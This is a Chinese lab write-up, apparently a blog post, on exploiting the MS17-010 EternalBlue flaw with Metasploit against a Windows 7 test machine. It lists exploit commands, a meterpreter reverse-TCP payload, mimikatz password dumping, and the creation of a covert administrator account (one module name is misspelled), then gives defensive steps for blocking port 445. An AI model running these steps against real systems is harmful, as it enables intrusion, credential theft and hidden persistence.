永恒之蓝 ms17_010_eternalblue

恶意代码会扫描开放共享端口的windows机器,无需用户任何
永恒之蓝是会扫描开放445端口文件共享端口的windows机器,无需用户任何操作,只要开机上网。
会感染windowsxp windows2000 windows2003 windowsvista mac os 系统等
1.实验环境:kali-linux windows7旗舰版
2.IP地址
kali:192.168.116.129
win7: 192.168.116.130
永恒之蓝 ms17_010_eternalblue_第1张图片
3.开始实验
永恒之蓝 ms17_010_eternalblue_第2张图片
进入msfconsole,利用windows/smb/ms17_010_eternalblue(永恒之蓝漏洞)
进行攻击靶机win7

4.使用永恒之蓝漏洞
use exploit/windows/smb/ms17_010_eternalbule
在这里插入图片描述
5.设定靶机ip和操作机ip(主要是靶机ip,因为端口在这个漏洞模块里默认是445,不用再设置,本地监听端口4444也是如此)
设定靶机ip(win7):set rhost 192.168.116.130
设定操作机ip(kali):set lhost 192.168.116.129
在这里插入图片描述
6:设置TCP连接
set payload windows/x64/meterpreter/reverse_tcp
永恒之蓝 ms17_010_eternalblue_第3张图片
7.查看配置
show options永恒之蓝 ms17_010_eternalblue_第4张图片

查看是否设置成功
8.攻击
run 或者exploit

永恒之蓝 ms17_010_eternalblue_第5张图片

永恒之蓝 ms17_010_eternalblue_第6张图片
永恒之蓝 ms17_010_eternalblue_第7张图片
攻击成功 进入到meterpreter模块
9.获取win7用户密码
利用load mimikatz 调用获取系统用户密码
因为我这个已经加载过一次了,所以会报错

在这里插入图片描述
如果是第一次加载就会出现
在这里插入图片描述
然后利用kerberos模块 来获取win7靶机的系统用户密码

永恒之蓝 ms17_010_eternalblue_第8张图片
9.提权
shell
永恒之蓝 ms17_010_eternalblue_第9张图片

永恒之蓝 ms17_010_eternalblue_第10张图片
得到靶机权限
10.或者新建一个用户,偷偷的控制权限使用
net user liang 123456 /add (创建一个用户密码为admin 123456)
11.提权,将新建用户liang提权到管理员权限
net localgroup administrators liang /add
永恒之蓝 ms17_010_eternalblue_第11张图片

查看权限
net user liang
永恒之蓝 ms17_010_eternalblue_第12张图片
12,远程连接靶机桌面

永恒之蓝 ms17_010_eternalblue_第13张图片

永恒之蓝 ms17_010_eternalblue_第14张图片
直接用自己所创建的用户远程连接进入系统。
渗透测试成功
主要攻击 win7,server2008 之类的机器
防御办法:
1,网上下载补丁,
2,关闭445端口,dos命令:
netsh advfirewall firewall add rule name=”deny445” dir=in protocol=tcp localport=445 action=block
netsh firewall set portopening protocol=tcp port=445 mode=disable name=deny445
检测445端口是否开启:
netstat -ano -p tcp | find “445”

你可能感兴趣的:(渗透,永恒之蓝)